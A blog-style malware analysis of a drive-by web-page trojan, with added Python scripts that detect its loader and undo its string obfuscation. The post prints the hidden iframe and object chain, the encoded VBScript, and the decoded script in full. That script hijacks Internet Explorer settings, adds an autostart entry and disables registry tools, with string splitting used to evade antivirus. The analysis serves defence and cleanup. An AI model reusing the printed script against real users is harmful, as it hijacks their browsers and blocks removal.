
How hidden web-page virus trojans are written


http://www.gipsky.com/
Today, while browsing the web, I picked up a web-page virus without noticing. I had Rising antivirus running, and had updated it only yesterday,

yet it gave no warning at all that a virus had got in. After some digging I finally understood how it works. My notes follow.

[Step 1]

First I used FlashGet to download the infected page and looked at the source. It contained this line:

<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>

This line plainly says: do not display it in the page, yet it is in the page. Obviously up to no good.

[Step 2]

Next I used FlashGet to download the http://my.5e163.com/ie.htm above and looked at its source.

It has only four lines:

<html>

<object data="http://my.5e163.com/com88.test">

</object>

</html>

[Step 3]

Downloading http://my.5e163.com/com88.test in turn gives the following code:

<html>

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<script LANGUAGE="VBscript.Encode">#@~^AQgAAA==@#@&hd4R" oqDbO ,JuJLJF/r[J`w?KJ[rWOhr[rl. w\bJ'J1.Wr[EdK0J'ED-(xr'rYnMJLJxJLEY,2E[r62ELJVK.JLJ Mw\lr[rkU-jOr[ElME[rY~KmJ[ELjsPr4DY2=zJ:Xc*qv2R^WsJ@#@&S/tc] TDbOnPrCr[E|/ELJi-UGJLJWOSJ[ECM wHbELJ^MWr[JkW6E[rYwq J'ED Dr'J JLEOPAJLJawE'rVGDr'JDw\mJ[Er -jYr'rl.r[rYPhlr'JT E~,J4ODw)J&:HR*q&cmK:E@#@&Akt ILMkOn,JCE'r|/JLE`-jKJLJ0Dhr'JmDn-tkE'rmDKE[r/W6E'JD-&xE[EODE[rU r[EO,2J'EXwE[rsKDELJD-tlr'Jbxw?J'EmDm4~nmJ[rLnJBPrtOY2lJzhXcX 8vf 1W:E~@#@&A/4 " LqDbY ,J_E[r|/JLJiwUWJLE0DhJLECD-tkE[E^MWE[rdW6J'ED-qUELJO MELJUJLJY,2r'JXwE[rVG.r[J.-tlJLErx'N0E[EC!VO{aE[rlLn|EDE'rVE~,E4YOa)Jz:HRlnF & mK:E@#@&h/4 IoMrO ,J_J'JF/r[Ej'jWr[EWDhJ'EmDn-trr[E1DKJ[r/KWJLJO-&xE'rY ME[rx r'EY,2r[E62ELjsWME[r .w:XwE'r [j"Jk-;MJLJV8JBEtDY2)Jzhzc* 8&cmWsE@#@&S/4R] L MkO ,ECr[EF;J[Ei'?GJLE6YAr[rlD-trJLJ^DKJ'EkW0r'JD-q E'JD MJ'JUnr[EY,3JLJa2r[jsGMJ'J.'KzaJLJ 9j"E[rSd-!DE'rV rSJ4YYal&zsXc*nFfcmG:r@#@&S/4 " o .bYnPrur[EnZr[J`-UGJLJWYSJ'EmD '\kr[J1.GJLJkWWJ'ED-(xr'JD .ELJxnELJOPAELJaaJLJVKDr'JDwKHJ'Ea N`E[rISr'E/'Er[EDsfr~EtDOw=z&hHR*nq & mKhr@#@&S/4RIoq.kD ~J_J'EnZJLEj'?Wr'E0Dhr[El.n'HrJLEmMWE'r/WWELJO-&Ur[ED MJ[rxE[rY~2r[EaaJ[rsWMJ[rn.-tlr[EkUwwkE[r./DPuGr[Jhn,nCJLET EBJ4YYa)J&:HRX 8vf 1W:r@#@&S/tc]noqDbYnPEur[E|;E[rjwjKJ[EWDhE[rCM wtkr[J1DKE[r/G0r[EO'qxr'JD Dr'ExJLJOP3ELJawr'J^W.ELJ .wtlE[rr -obDr[JkY,uJLJG:r[En,nlr'JT JBE4YDw=z&:z l qv2 mK:E@#@&h/4 " LMrD ~rCr[JnZr'J`-jWr[EWDhJLElM -hGsk1k/wHrELJ^DKE[r/GWr[JOw&xE[rODELJ JLJD~2r[E6aJ'E^WDr'JD-;GE[rxDDE[EG^PKlr'J E'rV-uELJG:ELJKmJLJoJBEFr~EIAMm9qrIGE@#@&h/4 ] TMkO ~E_J'Jn/JLJiwUWJ'E6YAJLEmDn'HbJ[rmMGJLJdW6J'ED-bE[rxNKE'js/'ZE[E;MDE[rnxD.nELJDdrr[EW w"J'rE -qAJLE(hSE[rr]3c2(AE~,JqApKS}IAR3(3~4YOw=&zsX XFvf 1WhJ@#@&S/4cIoMkDnPrCFJLJ/ELJj'jWr[J6OE[rhmJ'J.n'Hrmr'JMWE'r/WWELJO-qrr[E NKJ[rhkwZ!DE[rDnUr[JD# r[JMdE[rkKxwnGsr[Ek1rJLJnd'?XE'r/E[rOJ'r:'fkkJLEl(VE[r ]nr[JTr/r[JD.E[rX:WGJ'E^/E~rqJBJ]3V{f 6"fE@#@&Akt " TDbY~J_J'JnZE'rj-UGJLJ0DAE[rlM wHrELJ^DKE[r/GWr[JOw&xE[rODELJ JLJD~2r[E6aJ'E^WDr'JD-tCE[rk - 
kUELJ[WS~KbYE'rV ES,JRO欢迎访问,hHRXF &R1WsROr@#@&hbx[GSRm^G/@#@&eC4CAA==^#~@</script>

<script LANGUAGE="VBscript.Encode">#@~^1gMAAA==@#@&WU, MDWMPMn/!:nP aO@#@&ZmsV,SW Lo b{zN[sC-KDrYd`r【音乐影视】jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw k|)N9sl7G.kD k`E【上万首音乐】jsE4YOw=&zsX XFvf 1WhJ*@#@&@#@&Kx, DMWM~D/;:PUnXY@#@&/l^VPdGUow b{)N[9/VYK2`r音乐影视jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw k|)N9f kVOWa`r上万首音乐jsJ4ODwlzJhXc*nq &R^GsJb@#@&@#@&WU, MDWMPMn/!:nP aO@#@&ZmsV,SW Lo b{zN[p;r13Jl!Um4`E,娱乐明星网YJ~E4DY2)J&sX l 8v&cmKhJ*@#@&ZmVs~dWxTo b{b9[}Ebm0SCEU^4`E$上万首音乐YE~rtOOa)z&hHRX 82R^K:r#@#@&@#@&oE mOkKx~JKxownk|bN9oC\KDbYn/cHBPi#@#@&dKx~nMDW.~M dEsn,xnXY@#@&dU D~?,'~hkt /M lDn?4WDD^;Yvhkt ?2n1kCVwGV9 .dvjsC-KDrYdr#~3PrzJ,_,HP3J j"SEb@#@&dU KmDoOKlDt,'~j7@#@&djRUC\`b@#@&d?nO,?sP{~S/4cZM lD U4WMY^ED`Ad4R?anmblVwGsNDk`EsC-KDrYdJ*PQ~rz链接zE~3PHP3Ecj]dJ*@#@&i?^ KmDL DnCO4P',i@#@&d?^ jl7 v#@#@&3U9PoE ^YbWU@#@&@#@&o; mOkKU,SG ow k|b9[f/VYKwcHBPj*@#@&iWx,n.DKD,Dn/;hPU XO@#@&djnDP?~x,hdtc/M CD UtWMY1;Yvhdtc?2n1kl^oW^N MdcJzV^jd .dG d3DGwr#~Q,JzE~3PHP3Ecj]dJ*@#@&i?cPlMonYhlO4,'P`7@#@&d?cjC\`*@#@&2U[,s;x1OkKx@#@&@#@&rBEBAA==^#~@</script>

<script language="Jscript.Encode">#@~^TgAAAA==@#@&0; mDkW P1sWk rYv#~`@#@&/OKb: K;O`r/VWR^sK/n`*E~l#@#@&)@#@&^sK/nkDc*@#@&ARUAAA==^#~@</script>

</html>

A jumble, but one key word in it caught my attention: LANGUAGE="VBscript.Encode". Following that thread, I searched the web for material on it,

and found that Encode is used to encrypt (encode) the script. I searched for a good while without finding any decryption software; there is plenty of encryption software, but it was only at

<a href="http://www.china100.net/java1.htm" target=_blank>http://www.china100.net/java1.htm</a>

that I found an online decoding page. I pasted the jumbled code into that page's input box and it decoded successfully.

Then I copied the decoded code into Notepad,

and got the following code:
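Before reading the decoded script, it is worth noting that everything found in steps 1 to 3 can be spotted without decoding anything: a zero-size iframe, a bare <object data=...> hop to another page, an <object> instantiating the WScript.Shell CLSID, and a script block declared as VBscript.Encode or JScript.Encode. The scanner below is an added example for this write-up, not code from the original page; the three sample documents are constructed to mirror the pages described above (the encoded script body is a shortened placeholder).

```python
"""Flag the loader indicators found in steps 1-3 of the write-up.

Added example; not code from the original page. The sample pages below are
constructed to mirror the three pages the write-up describes."""
from html.parser import HTMLParser

# CLSID used in the analysed page to instantiate WScript.Shell from HTML;
# that object is what gives the decoded script RegWrite / CreateShortcut.
WSH_SHELL_CLSID = "f935dc22-1cf0-11d0-adb9-00c04fd58a0b"
ENCODED_LANGS = ("vbscript.encode", "jscript.encode")


class LoaderIndicatorScanner(HTMLParser):
    """Collect (indicator, detail) tuples while walking the document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            # A 0x0 (or display:none) iframe renders nothing but still fetches src.
            dims = (a.get("width", ""), a.get("height", ""))
            zero = all(d.strip().rstrip("px") == "0" for d in dims)
            hidden = zero or "display:none" in a.get("style", "").replace(" ", "")
            if hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "object":
            if a.get("data"):
                # A bare <object data=URL> loads and renders a further page.
                self.findings.append(("object_data_redirect", a["data"]))
            if WSH_SHELL_CLSID in a.get("classid", "").lower():
                self.findings.append(("wsh_shell_object", a.get("id", "")))
        elif tag == "script":
            lang = a.get("language", "").lower()
            if lang in ENCODED_LANGS:
                self.findings.append(("encoded_script", lang))


def scan_html(html):
    """Return the list of (indicator, detail) pairs found in one HTML document."""
    scanner = LoaderIndicatorScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples modelled on the three pages in the write-up.
LANDING_PAGE = ('<html><body>welcome'
                '<iframe src=http://my.5e163.com/ie.htm width=0 height=0 '
                'frameborder=0 scrolling=NO></iframe></body></html>')
IE_HTM = '<html><object data="http://my.5e163.com/com88.test"></object></html>'
COM88_TEST = ("<html><object id='wsh' "
              "classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"
              '<script LANGUAGE="VBscript.Encode">#@~^AQgAAA==@#@&...==^#~@'
              '</script></html>')  # encoded body shortened; placeholder only

if __name__ == "__main__":
    for name, doc in (("landing", LANDING_PAGE), ("ie.htm", IE_HTM),
                      ("com88.test", COM88_TEST)):
        for indicator, detail in scan_html(doc):
            print(f"{name}: {indicator} -> {detail}")
```

Each hop in the chain yields exactly one indicator, which is the point: a proxy or mail gateway that sees only the landing page can still act on the zero-size iframe, and one that sees only com88.test can act on the WScript.Shell CLSID and the encoded script block, without needing the decoder the author had to go looking for.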

<html>

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<script LANGUAGE="VBscript">

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Se"&"arch Pa"&"ge", "http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\def"&"ault_p"&"age_ur"&"l", "http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edURLs\ur"&"l1","http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edUR"&"Ls\ur"&"l2","http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ty"&"pedU"&"RL"&"s\u"&"rl3","http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fi"&"rst Ho"&"me Pa"&"ge","http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fir"&"st H"&"om"&"e Pa"&"ge","http://my.5e163.com"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Policies\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Co"&"ntr"&"ol Pa"&"ne"&"l\H"&"ome"&"Pa"&"ge","1","REG_DWORD"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\Wi"&"ndo"&"ws\C"&"urr"&"entVe"&"rsi"&"on\R"&"un\IE"&"XPL"&"ORE.EXE", "IEXPLORE.EXE http://my.5e163.com"

wsh.RegWrite "HK"&"C"&"U\So"&"ft"&"wa"&"re\Mic"&"ro"&"sof"&"t\Wi"&"ndo"&"ws\Cur"&"ren"&"tVe"&"rs"&"ion\Pol"&"ici"&"es\Sy"&"s"&"te"&"m\Dis"&"abl"&"eRe"&"gis"&"tr"&"yToo"&"ls","1","REG_DWORD"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Win"&"dow Tit"&"le", "--欢迎访问 my.5e163.com--"

window.close

</script>

<script LANGUAGE="VBscript">

on error resume next

Call LongFei_AddFavorites("【音乐影视】","http://my.5e163.com")

Call LongFei_AddFavorites("【上万首音乐】","http://my.5e163.com")



on error resume next

Call LongFei_AddDesktop("音乐影视","http://my.5e163.com")

Call LongFei_AddDesktop("上万首音乐","http://my.5e163.com")



on error resume next

Call LongFei_AddQuickLaunch("[娱乐明星网]","http://my.5e163.com")

Call LongFei_AddQuickLaunch("[上万首音乐]","http://my.5e163.com")



Function LongFei_AddFavorites(N, U)

on error resume next

Set S = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") "/" N ".URL")

S.TargetPath = U

S.Save()

Set Sl = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") "/链接/" N ".URL")

Sl.TargetPath = U

Sl.Save()

End Function



Function LongFei_AddDesktop(N, U)

on error resume next

Set S = wsh.CreateShortcut(wsh.SpecialFolders("AllUsersDesktop") "/" N ".URL")

S.TargetPath = U

S.Save()

End Function



</script>

<script language="Jscript">

function closeit() {

setTimeout("self.close()",5)

}

closeit()

</script>

</html>



From the code above it is easy to see that it writes to the registry, and that it uses word splitting to evade antivirus signature matching.

To sum up, this web-page virus uses the usual virus tricks:

1. Hiding the page, leading it into deeper layers, and using <object data="http://my.5e163.com/com88.test"> and the like to hide its identity

2. Encryption (encoding), which needs no explanation,

3. Word splitting,



wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://my.5e163.com"

is written as

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"

and so on, to evade antivirus software.
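The word-splitting trick only defeats a scanner that matches the literal bytes of the registry path; the operator `&` can be folded away mechanically, after which the path is plain text again. The Python below is an added example for this write-up, not the page's own code: it joins runs of VBScript string literals, pulls the target path and value out of every RegWrite call, and labels each key with what it controls, using the keys seen in the decoded script as a checklist of HKCU values worth inspecting after an infection like this. The three sample lines are constructed from the decoded listing above.

```python
"""Undo VBScript string splitting ("H"&"KC"&"U\So"&...) and classify the
registry writes it was hiding.

Added example; not code from the original page. SAMPLE is constructed from
the decoded script shown in the write-up."""
import re

# One VBScript string literal: double-quoted, with "" as an escaped quote.
STR_LIT = r'"(?:[^"]|"")*"'
# A run of two or more literals joined by & (whitespace allowed around &).
CONCAT = re.compile(rf'{STR_LIT}(?:\s*&\s*{STR_LIT})+')
REGWRITE = re.compile(r'\bRegWrite\s+(' + STR_LIT + r')\s*,\s*(' + STR_LIT + r')',
                      re.IGNORECASE)

# Keys from the decoded script (all under HKCU, so no admin rights are
# needed to write them) and what each one changes on the victim's machine.
SENSITIVE_KEYS = {
    r"internet explorer\main\start page": "IE home page hijack",
    r"internet explorer\main\search page": "IE search page hijack",
    r"internet explorer\main\default_page_url": "IE default page hijack",
    r"internet explorer\main\first home page": "IE first-run page hijack",
    r"internet explorer\typedurls": "planted address-bar history",
    r"internet explorer\control panel\homepage": "home page setting locked (policy)",
    r"internet explorer\main\window title": "browser title changed",
    r"currentversion\run": "autostart entry (persistence)",
    r"policies\system\disableregistrytools": "regedit disabled (anti-removal)",
}


def join_literals(line):
    """Collapse "a"&"b"&"c" into "abc" so the real string becomes visible."""
    def merge(match):
        parts = re.findall(STR_LIT, match.group(0))
        return '"' + "".join(p[1:-1] for p in parts) + '"'
    return CONCAT.sub(merge, line)


def classify(path):
    """Name the setting a registry path controls, or 'unclassified'."""
    low = path.lower()
    for needle, meaning in SENSITIVE_KEYS.items():
        if needle in low:
            return meaning
    return "unclassified"


def analyse_script(vbs):
    """Return (path, value, meaning) for every RegWrite call in the script,
    with the string splitting undone first."""
    out = []
    for raw in vbs.splitlines():
        match = REGWRITE.search(join_literals(raw))
        if match:
            path, value = match.group(1)[1:-1], match.group(2)[1:-1]
            out.append((path, value, classify(path)))
    return out


# Constructed sample: three lines taken from the decoded script above.
SAMPLE = r'''wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "HK"&"C"&"U\So"&"ft"&"wa"&"re\Mic"&"ro"&"sof"&"t\Wi"&"ndo"&"ws\Cur"&"ren"&"tVe"&"rs"&"ion\Pol"&"ici"&"es\Sy"&"s"&"te"&"m\Dis"&"abl"&"eRe"&"gis"&"tr"&"yToo"&"ls","1","REG_DWORD"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\Wi"&"ndo"&"ws\C"&"urr"&"entVe"&"rsi"&"on\R"&"un\IE"&"XPL"&"ORE.EXE", "IEXPLORE.EXE http://my.5e163.com"
'''

if __name__ == "__main__":
    for path, value, meaning in analyse_script(SAMPLE):
        print(f"{meaning:35s} {path} = {value}")
```

Running it prints the three writes with their plain paths, which is also the cleanup list for this particular infection: reset the IE Start Page, remove the IEXPLORE.EXE value under Run, and clear DisableRegistryTools (which the script sets precisely so that the victim cannot open regedit to undo the rest).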